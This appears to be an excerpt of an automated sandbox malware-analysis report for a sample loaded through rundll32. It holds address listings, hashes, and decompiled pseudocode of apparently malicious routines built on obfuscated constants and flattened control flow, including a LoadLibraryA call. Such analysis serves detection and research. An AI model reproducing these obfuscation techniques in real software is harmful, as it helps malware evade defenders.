                                                                                                                      0x00171d36
                                                                                                                      0x00171d42
                                                                                                                      0x00171d45
                                                                                                                      0x00171d48
                                                                                                                      0x00171d4f
                                                                                                                      0x00171d56
                                                                                                                      0x00171d5d
                                                                                                                      0x00171d64
                                                                                                                      0x00171d6b
                                                                                                                      0x00171d6f
                                                                                                                      0x00171d76
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d80
                                                                                                                      0x00171d92
                                                                                                                      0x00171f11
                                                                                                                      0x00171f17
                                                                                                                      0x00000000
                                                                                                                      0x00171d98
                                                                                                                      0x00171d9e
                                                                                                                      0x00171e2d
                                                                                                                      0x00171e33
                                                                                                                      0x00171efd
                                                                                                                      0x00171f04
                                                                                                                      0x00171f06
                                                                                                                      0x00000000
                                                                                                                      0x00171e39
                                                                                                                      0x00171e39
                                                                                                                      0x00171e40
                                                                                                                      0x00171e69
                                                                                                                      0x00171e69
                                                                                                                      0x00171e6d
                                                                                                                      0x00171e6f
                                                                                                                      0x00171e72
                                                                                                                      0x00171e7e
                                                                                                                      0x00171ead
                                                                                                                      0x00171eb2
                                                                                                                      0x00171ec1
                                                                                                                      0x00171ec7
                                                                                                                      0x00171ec7
                                                                                                                      0x00171eca
                                                                                                                      0x00171ecb
                                                                                                                      0x00171ece
                                                                                                                      0x00171ed3
                                                                                                                      0x00171ee0
                                                                                                                      0x00171ee9
                                                                                                                      0x00171ee9
                                                                                                                      0x00171e42
                                                                                                                      0x00171e42
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e4c
                                                                                                                      0x00171e53
                                                                                                                      0x00000000
                                                                                                                      0x00171e55
                                                                                                                      0x00171e55
                                                                                                                      0x00171e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171e5d
                                                                                                                      0x00171e53
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171da4
                                                                                                                      0x00171daa
                                                                                                                      0x00171e0d
                                                                                                                      0x00171e12
                                                                                                                      0x00171e14
                                                                                                                      0x00171e17
                                                                                                                      0x00171e1a
                                                                                                                      0x00171e20
                                                                                                                      0x00000000
                                                                                                                      0x00171e20
                                                                                                                      0x00171dac
                                                                                                                      0x00171db2
                                                                                                                      0x00171f8c
                                                                                                                      0x00171db8
                                                                                                                      0x00171dbe
                                                                                                                      0x00171f70
                                                                                                                      0x00171f70
                                                                                                                      0x00171f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171f7c
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dd6
                                                                                                                      0x00171de1
                                                                                                                      0x00171de3
                                                                                                                      0x00171de9
                                                                                                                      0x00171de9
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d7f
                                                                                                                      0x00171d7d
                                                                                                                      0x00171dbe
                                                                                                                      0x00171db2
                                                                                                                      0x00171daa
                                                                                                                      0x00171d9e
                                                                                                                      0x00171f9a
                                                                                                                      0x00000000
                                                                                                                      0x00171f9a
                                                                                                                      0x00171f21
                                                                                                                      0x00171f24
                                                                                                                      0x00171f2d
                                                                                                                      0x00171f51
                                                                                                                      0x00171f60
                                                                                                                      0x00171f65
                                                                                                                      0x00171f68
                                                                                                                      0x00171f6f
                                                                                                                      0x00000000
                                                                                                                      0x00171f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: ab9982e1fd34e1acfadeb7fb27cea3b02257f3add3a4c122da7db1bc447547e0
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 2BC1F0B1C0135DDBDB68CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001804B8 Relevance: 9.0, Strings: 7, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E001804B8() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t191;
				signed int _t193;
				signed int _t194;
				void* _t198;
				void* _t219;
				intOrPtr _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				intOrPtr* _t232;
				signed int _t233;
				signed int* _t234;

				_t234 =  &_v88;
				_v12 = 0x2790ea;
				_v8 = 0xba5a5c;
				_t198 = 0x3d69ab1;
				_t224 = 0;
				_v4 = 0;
				_v60 = 0x2fd7ed;
				_v60 = _v60 | 0x771a9d11;
				_t225 = 0x45;
				_v60 = _v60 * 0x4e;
				_v60 = _v60 ^ 0x55773f16;
				_v40 = 0xe86db6;
				_v40 = _v40 | 0xabe4da9c;
				_v40 = _v40 ^ 0xabe3ff81;
				_v84 = 0x4e4c43;
				_v84 = _v84 + 0x2260;
				_v84 = _v84 / _t225;
				_t226 = 0x36;
				_v84 = _v84 / _t226;
				_v84 = _v84 ^ 0x000c99de;
				_v36 = 0x2c2e8d;
				_v36 = _v36 ^ 0x89bc573f;
				_v36 = _v36 ^ 0x899e3850;
				_v56 = 0xc456b8;
				_v56 = _v56 << 1;
				_t227 = 0x7a;
				_v56 = _v56 / _t227;
				_v56 = _v56 ^ 0x000dd00d;
				_v24 = 0x6eec6c;
				_v24 = _v24 * 0x67;
				_v24 = _v24 ^ 0x2ca24ccd;
				_v28 = 0xbd5c18;
				_v28 = _v28 + 0xd697;
				_v28 = _v28 ^ 0x00bf4353;
				_v32 = 0x8ab54f;
				_v32 = _v32 * 0x47;
				_v32 = _v32 ^ 0x267a3e13;
				_v88 = 0x583e0f;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0xffff5904;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xb14dc739;
				_v44 = 0x7902f;
				_v44 = _v44 + 0xffff35ef;
				_v44 = _v44 ^ 0x000a0038;
				_v64 = 0xab1413;
				_v64 = _v64 + 0xffff0fb9;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0xaa2b0b8a;
				_v76 = 0x32b087;
				_v76 = _v76 | 0x42a79f0a;
				_v76 = _v76 ^ 0x7a54616b;
				_v76 = _v76 + 0x85;
				_v76 = _v76 ^ 0x38e777a2;
				_v20 = 0xba9969;
				_v20 = _v20 | 0x60b184e2;
				_v20 = _v20 ^ 0x60bd1ab4;
				_v52 = 0x531ceb;
				_v52 = _v52 ^ 0x8fc4675a;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x23e32c7b;
				_v80 = 0xb054c0;
				_t228 = 0x5b;
				_v80 = _v80 / _t228;
				_v80 = _v80 << 1;
				_v80 = _v80 + 0xffffcecb;
				_v80 = _v80 ^ 0x0007d204;
				_v16 = 0x58f1c6;
				_v16 = _v16 ^ 0x8ee10e17;
				_v16 = _v16 ^ 0x8ebef1bd;
				_v68 = 0x312414;
				_t229 = 0x7b;
				_t233 = _v16;
				_v68 = _v68 / _t229;
				_v68 = _v68 + 0x1b34;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00095176;
				_t197 = _v16;
				_t230 = _v16;
				_v72 = 0xc0cd63;
				_v72 = _v72 | 0x9a162f11;
				_v72 = _v72 << 3;
				_v72 = _v72 * 0x12;
				_v72 = _v72 ^ 0x18eea785;
				_v48 = 0xaed007;
				_v48 = _v48 ^ 0x406d7cc3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x061a7dff;
				while(1) {
					L1:
					_t219 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t198 != 0x2c774a6) {
								if(_t198 == 0x3d69ab1) {
									_t198 = 0x526c216;
									continue;
								} else {
									if(_t198 == 0x4efcef6) {
										E0018E689(_v76, _v20, _v52, _t233, _v80);
										_t234 =  &(_t234[3]);
										_t198 = 0x2c774a6;
										goto L1;
									} else {
										if(_t198 == 0x526c216) {
											_t231 =  *0x19520c; // 0x0
											_t232 = _t231 + 0x220;
											while( *_t232 != _t219) {
												_t232 = _t232 + 2;
											}
											_t230 = _t232 + 2;
											_t198 = 0xb318200;
											goto L2;
										} else {
											if(_t198 == 0x54b01d8) {
												_t193 = E00172E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
												_t234 =  &(_t234[5]);
												_t233 = _t193;
												_t191 = 0xe4f0407;
												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
												_t219 = 0x5c;
												continue;
											} else {
												if(_t198 == 0xb318200) {
													_t194 = E0017EB36(_v84, _v36, _t198, _v40);
													_t197 = _t194;
													_t234 =  &(_t234[3]);
													if(_t194 != 0) {
														_t198 = 0x54b01d8;
														while(1) {
															L1:
															_t219 = 0x5c;
															goto L2;
														}
													}
												} else {
													if(_t198 != _t191) {
														goto L21;
													} else {
														E0017C67D(_t233, _v88, _v44, _v64);
														_t224 =  !=  ? 1 : _t224;
														_t198 = 0x4efcef6;
														while(1) {
															L1:
															_t219 = 0x5c;
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E0018E689(_v16, _v68, _v72, _t197, _v48);
							_t234 =  &(_t234[3]);
							_t198 = 0xc9e12b8;
							_t191 = 0xe4f0407;
							_t219 = 0x5c;
							L21:
						} while (_t198 != 0xc9e12b8);
						L22:
						return _t224;
					}
				}
			}









































                                                                                                                      0x001804b8
                                                                                                                      0x001804bb
                                                                                                                      0x001804c5
                                                                                                                      0x001804cd
                                                                                                                      0x001804d6
                                                                                                                      0x001804d8
                                                                                                                      0x001804dc
                                                                                                                      0x001804e4
                                                                                                                      0x001804f3
                                                                                                                      0x001804f6
                                                                                                                      0x001804fa
                                                                                                                      0x00180502
                                                                                                                      0x0018050a
                                                                                                                      0x00180512
                                                                                                                      0x0018051a
                                                                                                                      0x00180522
                                                                                                                      0x00180532
                                                                                                                      0x0018053a
                                                                                                                      0x0018053f
                                                                                                                      0x00180545
                                                                                                                      0x0018054d
                                                                                                                      0x00180555
                                                                                                                      0x0018055d
                                                                                                                      0x00180565
                                                                                                                      0x0018056d
                                                                                                                      0x00180575
                                                                                                                      0x00180578
                                                                                                                      0x0018057c
                                                                                                                      0x00180584
                                                                                                                      0x00180591
                                                                                                                      0x00180595
                                                                                                                      0x0018059d
                                                                                                                      0x001805a5
                                                                                                                      0x001805ad
                                                                                                                      0x001805b5
                                                                                                                      0x001805c2
                                                                                                                      0x001805c6
                                                                                                                      0x001805ce
                                                                                                                      0x001805d6
                                                                                                                      0x001805db
                                                                                                                      0x001805e3
                                                                                                                      0x001805e8
                                                                                                                      0x001805f0
                                                                                                                      0x001805f8
                                                                                                                      0x00180600
                                                                                                                      0x00180608
                                                                                                                      0x00180610
                                                                                                                      0x00180618
                                                                                                                      0x0018061d
                                                                                                                      0x00180625
                                                                                                                      0x0018062d
                                                                                                                      0x00180635
                                                                                                                      0x0018063d
                                                                                                                      0x00180645
                                                                                                                      0x0018064d
                                                                                                                      0x00180655
                                                                                                                      0x0018065d
                                                                                                                      0x00180665
                                                                                                                      0x0018066d
                                                                                                                      0x00180675
                                                                                                                      0x0018067a
                                                                                                                      0x00180682
                                                                                                                      0x00180692
                                                                                                                      0x00180697
                                                                                                                      0x0018069d
                                                                                                                      0x001806a1
                                                                                                                      0x001806a9
                                                                                                                      0x001806b1
                                                                                                                      0x001806b9
                                                                                                                      0x001806c1
                                                                                                                      0x001806c9
                                                                                                                      0x001806d5
                                                                                                                      0x001806d8
                                                                                                                      0x001806dc
                                                                                                                      0x001806e0
                                                                                                                      0x001806e8
                                                                                                                      0x001806ed
                                                                                                                      0x001806f5
                                                                                                                      0x001806f9
                                                                                                                      0x001806fd
                                                                                                                      0x00180705
                                                                                                                      0x0018070d
                                                                                                                      0x00180717
                                                                                                                      0x0018071b
                                                                                                                      0x00180723
                                                                                                                      0x0018072b
                                                                                                                      0x00180733
                                                                                                                      0x00180738
                                                                                                                      0x00180740
                                                                                                                      0x00180740
                                                                                                                      0x00180742
                                                                                                                      0x00180743
                                                                                                                      0x00180743
                                                                                                                      0x00180748
                                                                                                                      0x00000000
                                                                                                                      0x00180748
                                                                                                                      0x0018075a
                                                                                                                      0x0018085a
                                                                                                                      0x00000000
                                                                                                                      0x00180760
                                                                                                                      0x00180766
                                                                                                                      0x00180848
                                                                                                                      0x0018084d
                                                                                                                      0x00180850
                                                                                                                      0x00000000
                                                                                                                      0x0018076c
                                                                                                                      0x00180772
                                                                                                                      0x00180814
                                                                                                                      0x0018081a
                                                                                                                      0x00180825
                                                                                                                      0x00180822
                                                                                                                      0x00180822
                                                                                                                      0x0018082a
                                                                                                                      0x0018082d
                                                                                                                      0x00000000
                                                                                                                      0x00180778
                                                                                                                      0x0018077e
                                                                                                                      0x001807f3
                                                                                                                      0x001807f8
                                                                                                                      0x001807fb
                                                                                                                      0x00180804
                                                                                                                      0x00180809
                                                                                                                      0x0018080e
                                                                                                                      0x00000000
                                                                                                                      0x00180780
                                                                                                                      0x00180786
                                                                                                                      0x001807c1
                                                                                                                      0x001807c6
                                                                                                                      0x001807c8
                                                                                                                      0x001807cd
                                                                                                                      0x001807d3
                                                                                                                      0x00180740
                                                                                                                      0x00180740
                                                                                                                      0x00180742
                                                                                                                      0x00000000
                                                                                                                      0x00180742
                                                                                                                      0x00180740
                                                                                                                      0x00180788
                                                                                                                      0x0018078a
                                                                                                                      0x00000000
                                                                                                                      0x00180790
                                                                                                                      0x0018079e
                                                                                                                      0x001807aa
                                                                                                                      0x001807ad
                                                                                                                      0x00180740
                                                                                                                      0x00180740
                                                                                                                      0x00180742
                                                                                                                      0x00180743
                                                                                                                      0x00000000
                                                                                                                      0x00180743
                                                                                                                      0x00180740
                                                                                                                      0x0018078a
                                                                                                                      0x00180786
                                                                                                                      0x0018077e
                                                                                                                      0x00180772
                                                                                                                      0x00180766
                                                                                                                      0x00000000
                                                                                                                      0x0018075a
                                                                                                                      0x00180875
                                                                                                                      0x0018087a
                                                                                                                      0x0018087d
                                                                                                                      0x00180882
                                                                                                                      0x00180889
                                                                                                                      0x0018088a
                                                                                                                      0x0018088a
                                                                                                                      0x00180896
                                                                                                                      0x0018089f
                                                                                                                      0x0018089f
                                                                                                                      0x00180743

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 04aa30f25a01d8f4f12d298d790cf49d581afdfcd6b71565313c5ac54d3de3b9
                                                                                                                      • Instruction ID: 2dbce8b1c3a603c73b195e32775db517be2bb3cf9740ece6c0af27942a74932a
                                                                                                                      • Opcode Fuzzy Hash: 04aa30f25a01d8f4f12d298d790cf49d581afdfcd6b71565313c5ac54d3de3b9
                                                                                                                      • Instruction Fuzzy Hash: DCA165715083459FC399DF65C88981BFBF1FBD8358F10891DF59A96260D3B18A498F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction ID: 7277114792b78e9780c732931990dc2d47c5509fa80221895377f97ab4224877
                                                                                                                      • Opcode Fuzzy Hash: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction Fuzzy Hash: B711E171900118AFDB12DB64CC46BDD73B8EF09315F1241A1F7059F0A2EEB0EA869AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00189186 Relevance: 7.8, Strings: 6, Instructions: 330COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00189186(void* __ecx, void* __edx, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				void* _t336;
				void* _t361;
				intOrPtr _t365;
				intOrPtr _t367;
				void* _t371;
				intOrPtr _t373;
				intOrPtr _t376;
				void* _t386;
				void* _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t439;

				_push(_a8);
				_t425 = 0;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t336);
				_v1592 = 0xe90366;
				_t439 =  &(( &_v1704)[4]);
				_v1592 = _v1592 | 0xd8b262de;
				_v1592 = _v1592 ^ 0xd8fb63d7;
				_t386 = 0x283f0d8;
				_v1624 = 0xa39629;
				_v1624 = _v1624 >> 4;
				_t426 = 0x2c;
				_v1624 = _v1624 / _t426;
				_v1624 = _v1624 ^ 0x000bae79;
				_v1600 = 0xef5a7d;
				_t19 =  &_v1600; // 0xef5a7d
				_t427 = 0x1f;
				_v1600 =  *_t19 / _t427;
				_v1600 = _v1600 ^ 0x000c380d;
				_v1568 = 0xec630a;
				_t28 =  &_v1568; // 0xec630a
				_t428 = 0x1c;
				_v1568 =  *_t28 / _t428;
				_v1568 = _v1568 ^ 0x0002d50e;
				_v1668 = 0x697ac4;
				_v1668 = _v1668 ^ 0x43408629;
				_v1668 = _v1668 << 4;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0xe763f227;
				_v1692 = 0xf5db19;
				_v1692 = _v1692 ^ 0xaa29ad2f;
				_v1692 = _v1692 >> 0xe;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 ^ 0x00a75d57;
				_v1620 = 0x9b43e;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 + 0x190a;
				_v1620 = _v1620 ^ 0x0005a1ac;
				_v1572 = 0xd92c9a;
				_v1572 = _v1572 << 0xc;
				_v1572 = _v1572 ^ 0x92c3ac8e;
				_v1700 = 0x6f30ff;
				_v1700 = _v1700 << 0xe;
				_t429 = 0x26;
				_v1700 = _v1700 / _t429;
				_v1700 = _v1700 >> 0xe;
				_v1700 = _v1700 ^ 0x0006fa3f;
				_v1684 = 0x78d9c1;
				_v1684 = _v1684 * 0x25;
				_v1684 = _v1684 | 0x77a8ffeb;
				_v1684 = _v1684 ^ 0x77fd8a30;
				_v1656 = 0xa4e4c6;
				_v1656 = _v1656 + 0xa942;
				_v1656 = _v1656 + 0xffff73ad;
				_v1656 = _v1656 ^ 0x00a1f1ac;
				_v1652 = 0x64ed51;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 * 0x5c;
				_v1652 = _v1652 ^ 0x00034dfd;
				_v1580 = 0x83183a;
				_v1580 = _v1580 ^ 0x32eb2c8f;
				_v1580 = _v1580 ^ 0x326d5fbf;
				_v1564 = 0x95c9ec;
				_v1564 = _v1564 >> 6;
				_v1564 = _v1564 ^ 0x0008f372;
				_v1588 = 0xb1660f;
				_v1588 = _v1588 + 0x4492;
				_v1588 = _v1588 ^ 0x00bbacbc;
				_v1676 = 0x88aa71;
				_v1676 = _v1676 << 0xd;
				_v1676 = _v1676 | 0x03baa1bf;
				_v1676 = _v1676 << 6;
				_v1676 = _v1676 ^ 0xffa89651;
				_v1632 = 0x868f26;
				_v1632 = _v1632 << 1;
				_v1632 = _v1632 + 0xffffb6b3;
				_v1632 = _v1632 ^ 0x010eb46f;
				_v1640 = 0xd64df9;
				_v1640 = _v1640 >> 6;
				_t430 = 0x32;
				_v1640 = _v1640 / _t430;
				_v1640 = _v1640 ^ 0x000ccd63;
				_v1664 = 0x22c79e;
				_t431 = 0xf;
				_v1664 = _v1664 * 9;
				_v1664 = _v1664 << 0xa;
				_v1664 = _v1664 ^ 0x4da35e74;
				_v1664 = _v1664 ^ 0xa9bd4987;
				_v1696 = 0xf7f994;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 + 0xffff3f9d;
				_v1696 = _v1696 ^ 0x000a4602;
				_v1648 = 0xefbcda;
				_v1648 = _v1648 | 0xaae2c2a8;
				_v1648 = _v1648 + 0x86a3;
				_v1648 = _v1648 ^ 0xaafdd76e;
				_v1680 = 0x28593a;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 | 0x0bfc0be2;
				_v1680 = _v1680 + 0x55be;
				_v1680 = _v1680 ^ 0x0bf8c584;
				_v1596 = 0xd047d1;
				_v1596 = _v1596 | 0xaa1708a2;
				_v1596 = _v1596 ^ 0xaad8bb32;
				_v1604 = 0xf2c56f;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x3cb75693;
				_v1644 = 0x36719;
				_v1644 = _v1644 ^ 0x56bc0977;
				_t432 = 7;
				_v1644 = _v1644 / _t431;
				_v1644 = _v1644 ^ 0x05c6baf7;
				_v1672 = 0x1a4ba5;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 / _t432;
				_v1672 = _v1672 >> 2;
				_v1672 = _v1672 ^ 0x0008f53b;
				_v1628 = 0xe04a84;
				_v1628 = _v1628 | 0x71ddf7de;
				_v1628 = _v1628 + 0xd6a7;
				_v1628 = _v1628 ^ 0x71f84a11;
				_v1688 = 0xb42ba6;
				_t433 = 0x24;
				_v1688 = _v1688 / _t433;
				_v1688 = _v1688 | 0x51e7f8f6;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0x3fc44495;
				_v1704 = 0x876d58;
				_v1704 = _v1704 + 0x4bbd;
				_v1704 = _v1704 ^ 0xe392f1ca;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x62a598c6;
				_v1636 = 0x545e02;
				_v1636 = _v1636 + 0xcb63;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x0aae6d2b;
				_v1612 = 0x26c885;
				_v1612 = _v1612 | 0x5f90e8de;
				_t434 = 0x66;
				_v1612 = _v1612 * 0x52;
				_v1612 = _v1612 ^ 0xa89ce640;
				_v1576 = 0x171d42;
				_v1576 = _v1576 ^ 0x4acb7e15;
				_v1576 = _v1576 ^ 0x4adecc08;
				_v1660 = 0xcbbc2;
				_v1660 = _v1660 >> 8;
				_v1660 = _v1660 / _t434;
				_v1660 = _v1660 ^ 0x3398a9eb;
				_v1660 = _v1660 ^ 0x33921795;
				_v1608 = 0x5e75bf;
				_v1608 = _v1608 + 0xa7f5;
				_v1608 = _v1608 >> 1;
				_v1608 = _v1608 ^ 0x002982b8;
				_v1584 = 0x10acd4;
				_v1584 = _v1584 + 0x75ec;
				_v1584 = _v1584 ^ 0x001a134d;
				_v1616 = 0x7387ff;
				_v1616 = _v1616 | 0x122d515f;
				_v1616 = _v1616 + 0xffffa5db;
				_v1616 = _v1616 ^ 0x12702e1c;
				L1:
				while(_t386 != 0x283f0d8) {
					if(_t386 == 0xc593167) {
						_push(_v1700);
						_push(_v1572);
						_push(0x1710fc);
						_t361 = E0017AB66(_v1692, _v1620, __eflags);
						E0018C66E( &_v1560, __eflags);
						_t365 =  *0x19520c; // 0x0
						_t367 =  *0x19520c; // 0x0
						E0018BDB5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580, _t367 + 0x220, _v1564, _v1588, _t365 + 8,  &_v1560,  &_v1040, _t361);
						E0017AE03(_v1676, _v1632, _v1640, _t361);
						_t439 =  &(_t439[0x10]);
						L8:
						_t386 = 0xe92714c;
						continue;
					}
					if(_t386 == 0xd2f347e) {
						_push(_v1680);
						_push(_v1648);
						_push(0x17121c);
						_t371 = E0017AB66(_v1664, _v1696, __eflags);
						E0018C66E( &_v1560, __eflags);
						_t373 =  *0x19520c; // 0x0
						_t376 =  *0x19520c; // 0x0
						__eflags = 0;
						E00175F83(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560, _t376 + 0x220, _v1628,  &_v1040, _t373 + 8, _v1688, _t371);
						E0017AE03(_v1704, _v1636, _v1612, _t371);
						_t439 =  &(_t439[0x11]);
						goto L8;
					}
					if(_t386 == 0xe92714c) {
						_push(_v1616);
						_push(_v1584);
						_push(_v1608);
						_push(_t425);
						_push(_t425);
						_push(_v1660);
						_push(_t386);
						_push(_t425);
						__eflags = E00179700( &_v520, _v1576, __eflags);
						_t425 =  !=  ? 1 : _t425;
					} else {
						if(_t386 != 0x3c91f62) {
							continue;
						} else {
						}
					}
					return _t425;
				}
				_push(_t386);
				E0017EA7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
				_t439 =  &(_t439[7]);
				_t386 = 0xc593167;
				goto L1;
			}





























































                                                                                                                      0x00189190
                                                                                                                      0x00189197
                                                                                                                      0x00189199
                                                                                                                      0x0018919a
                                                                                                                      0x0018919b
                                                                                                                      0x0018919c
                                                                                                                      0x001891a1
                                                                                                                      0x001891ac
                                                                                                                      0x001891af
                                                                                                                      0x001891bc
                                                                                                                      0x001891c7
                                                                                                                      0x001891cc
                                                                                                                      0x001891d4
                                                                                                                      0x001891df
                                                                                                                      0x001891e4
                                                                                                                      0x001891ea
                                                                                                                      0x001891f2
                                                                                                                      0x001891fa
                                                                                                                      0x001891fe
                                                                                                                      0x00189203
                                                                                                                      0x00189209
                                                                                                                      0x00189211
                                                                                                                      0x0018921c
                                                                                                                      0x00189223
                                                                                                                      0x00189228
                                                                                                                      0x00189231
                                                                                                                      0x0018923c
